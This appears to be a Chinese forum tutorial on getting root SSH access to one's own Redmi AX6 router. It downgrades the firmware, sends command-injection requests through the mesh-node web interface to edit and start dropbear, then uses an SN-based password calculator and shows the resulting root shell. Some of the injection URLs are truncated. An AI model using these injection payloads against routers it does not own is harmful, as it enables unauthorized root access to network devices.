红米ax6 ssh获取教程一键 不用op路由器 成功版本已经测试

hol***

今天有时间 又测试了论坛的帖子
https://www.right.com.cn/forum/thread-8294249-1-1.html
这个给红米ax6获取ssh 的方法 是 通过mesh漏洞 注入命令获取ssh

测试了下 发现居然可以了
降级到1.016
https://cdn.cnbj1.fds.api.mi-img ... re_a7244_1.0.16.bin

登陆你的路由器 替换stok

下面两个是通过漏洞注入命令获取ssh 这个luci有两个端口 80 8080 都测试下


http://192.168.31.1/cgi-bin/luci ... -i%20%27s/channel=.*/channel=\%22debug\%22/g%27%20/etc/init.d/dropbear;%20/etc/init.d/dropbear%20start;



http://192.168.31.1:8080/cgi-bin ... -i%20%27s/channel=.*/channel=\%22debug\%22/g%27%20/etc/init.d/dropbear;%20/etc/init.d/dropbear%20start;



显示code就是注入成功


下面这个是通过漏洞注入重启
然后我好奇试试重启 结果路由器真的重启了 而且ssh端口打开了
http://192.168.31.1:8080/cgi-bin ... twork/add_mesh_node



我的路由器是ap模式 ip是 192.168.5.144

/tmp » nmap 192.168.5.144                                                                                
Starting Nmap 7.95 ( https://nmap.org ) at 2024-05-02 12:13 CEST
Nmap scan report for 192.168.5.144
Host is up (0.10s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
443/tcp  open  https
8080/tcp open  http-proxy


直接ssh显示密钥错误

/tmp » ssh -C root@192.168.5.144                                                                       


Unable to negotiate with 192.168.5.144 port 22: no matching host key type found. Their offer: ssh-rsa


后面搜索到方法了

ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa root@192.168.5.144


登陆路由器 界面那里显示了sn码
使用
https://www.gaicas.com/miwifi-ssh-key.html

这个计算ssh密码


ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa root@192.168.5.144



输入 就成功了


BusyBox v1.25.1 (2020-07-10 06:27:39 UTC) built-in shell (ash)

-----------------------------------------------------
       Welcome to XiaoQiang!
-----------------------------------------------------



root@XiaoQiang:~# df -h
Filesystem                Size      Used Available Use% Mounted on
mtd:ubi_rootfs           22.8M     22.8M         0 100% /
tmpfs                   196.5M    888.0K    195.7M   0% /tmp
ubi1_0                   23.1M      3.6M     18.2M  17% /data
ubi1_0                   23.1M      3.6M     18.2M  17% /userdisk
mtd:ubi_rootfs           22.8M     22.8M         0 100% /userdisk/data
ubi1_0                   23.1M      3.6M     18.2M  17% /etc
ubi1_0                   23.1M      3.6M     18.2M  17% /ini
tmpfs                   512.0K     24.0K    488.0K   5% /dev



老方法是要一台op路由器  这个方法不用